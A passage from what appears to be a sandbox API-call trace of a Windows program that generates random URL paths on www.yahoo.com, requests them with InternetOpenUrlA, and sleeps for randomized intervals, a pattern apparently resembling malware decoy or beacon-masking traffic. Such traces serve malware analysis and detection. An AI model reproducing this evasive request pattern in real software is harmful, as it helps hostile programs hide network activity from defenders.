0x7ffc5eceb7b0 [0170.618] Sleep (dwMilliseconds=0x1772e) [0170.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0170.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0170.887] GetProcessHeap () returned 0x440000 [0170.887] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5830 [0170.887] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0170.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5831, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x4f5831) returned 0x0 [0170.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.888] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.889] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.889] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.943] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.944] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.945] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0170.946] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.946] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0170.946] GetProcessHeap () returned 0x440000 [0170.946] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0170.946] lstrcpyA (in: lpString1=0x472f30, lpString2="\x10t\x98\x1fs://www.yahoo.com" | out: lpString1="\x10t\x98\x1fs://www.yahoo.com") returned="\x10t\x98\x1fs://www.yahoo.com" [0170.946] lstrcatA (in: lpString1="\x10t\x98\x1fs://www.yahoo.com", lpString2="/cUVezadmpzzrpy9mfsy7s1q/" | out: lpString1="\x10t\x98\x1fs://www.yahoo.com/cUVezadmpzzrpy9mfsy7s1q/") returned="\x10t\x98\x1fs://www.yahoo.com/cUVezadmpzzrpy9mfsy7s1q/" [0170.946] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0170.946] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x10t\x98\x1fs://www.yahoo.com/cUVezadmpzzrpy9mfsy7s1q/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0170.947] GetProcessHeap () returned 0x440000 [0170.947] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0170.947] GetProcessHeap () returned 0x440000 [0170.947] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5830 | out: hHeap=0x440000) returned 1 [0170.947] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0170.947] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0170.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0170.947] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0170.947] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0170.947] Sleep (dwMilliseconds=0x17026) [0171.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0171.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0171.150] GetProcessHeap () returned 0x440000 [0171.150] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f5870 [0171.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0171.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f5871, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x4f5871) returned 0x0 [0171.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0171.337] GetProcessHeap () returned 0x440000 [0171.337] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0171.337] lstrcpyA (in: lpString1=0x4726f0, lpString2="pXO" | out: lpString1="pXO") returned="pXO" [0171.337] lstrcatA (in: lpString1="pXO", lpString2="/xctzqu6erqnGd7hz3ybybncibifkyxa1fE/" | out: lpString1="pXO/xctzqu6erqnGd7hz3ybybncibifkyxa1fE/") returned="pXO/xctzqu6erqnGd7hz3ybybncibifkyxa1fE/" [0171.337] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0171.337] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="pXO/xctzqu6erqnGd7hz3ybybncibifkyxa1fE/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0171.337] GetProcessHeap () returned 0x440000 [0171.337] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0171.337] GetProcessHeap () returned 0x440000 [0171.337] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5870 | out: hHeap=0x440000) returned 1 [0171.337] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0171.338] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0171.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0171.338] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0171.338] Sleep (dwMilliseconds=0xff53) [0171.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0171.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0171.519] GetProcessHeap () returned 0x440000 [0171.519] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0171.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0171.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x29, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0171.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0171.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b27a, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x3a1b27a) returned 0x0 [0171.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.526] BCryptGenRandom (in: hAlgorithm=0x0, 